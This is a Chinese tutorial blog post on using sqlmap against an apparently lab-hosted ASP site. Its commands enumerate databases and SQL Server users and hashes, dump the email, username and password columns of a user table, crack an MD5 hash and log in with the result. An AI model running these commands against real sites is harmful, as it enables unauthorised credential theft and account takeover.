Sqlmap

又到了期末的时候......

于是,各种考试、课程设计、大作业等如期而至

这两天都在各种忙,我会尽力每天更新,还望各位老板理解

Sqlmap,话不多说直接进入主题

一、检测注入点是否可用

C:\Python27\sqlmap>pythonsqlmap.py -uhttp://192.168.1.150/products.asp?id=134

Sqlmap –uhttp

参数:

-u:指定注入点url

结果:

注入结果展示:

(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

(2)web服务器系统为windows 2003 or XP

(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0

(4)数据库类型为:SQLSERVER2000

其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

C:\Python27\sqlmap>pythonsqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch

二、暴库

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

C:\Python27\sqlmap>pythonsqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs

参数:

--dbs:dbs前面有两条杠,请看清楚。

结果:

结果显示该sqlserver中共包含7个可用的数据库。

三、web当前使用的数据库

C:\Python27\sqlmap>pythonsqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db

四、web数据库使用账户

C:\Python27\sqlmap>pythonsqlmap.py -u "http://192.168.1.150/products.asp?id=134"--current-user

五、列出sqlserver所有用户

C:\Python27\sqlmap>pythonsqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users

六、数据库账户与密码

C:\Python27\sqlmap>pythonsqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords

七、列出数据库中的表

C:\Python27\sqlmap>pythonsqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata--tables

参数:

-D:指定数据库名称

--tables:列出表

结果:

结果体现共列出了34张表。

八、列出表中字段

C:\Python27\sqlmap>pythonsqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata-T userb --columns

参数:

-D:指定数据库名称

-T:指定要列出字段的表

--columns:指定列出字段

结果:

结果显示该userb表中包含了23条字段。

九、暴字段内容

C:\Python27\sqlmap>pythonsqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata-T userb -C "email,Username,userpassword" --dump

参数:

-C :指定要暴的字段

--dump:将结果导出

结果:

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

C:\Python27\sqlmap>pythonsqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata-T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

参数:

--start:指定开始的行

--stop:指定结束的行

此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

结果如下:

十、验证结果

通过上图结果看到其中的一个用户信息为:

username: 1.asp

password: 49ba59abbe56e057

通过md5解密,得到该hash的原文密码为:123456

拿到账号密码我们来测试是否可以登录,登录结果如下:

验证成功!

未完待续,继续努力!

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180624G000CH00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

同媒体快讯

扫码关注云+社区

领取腾讯云代金券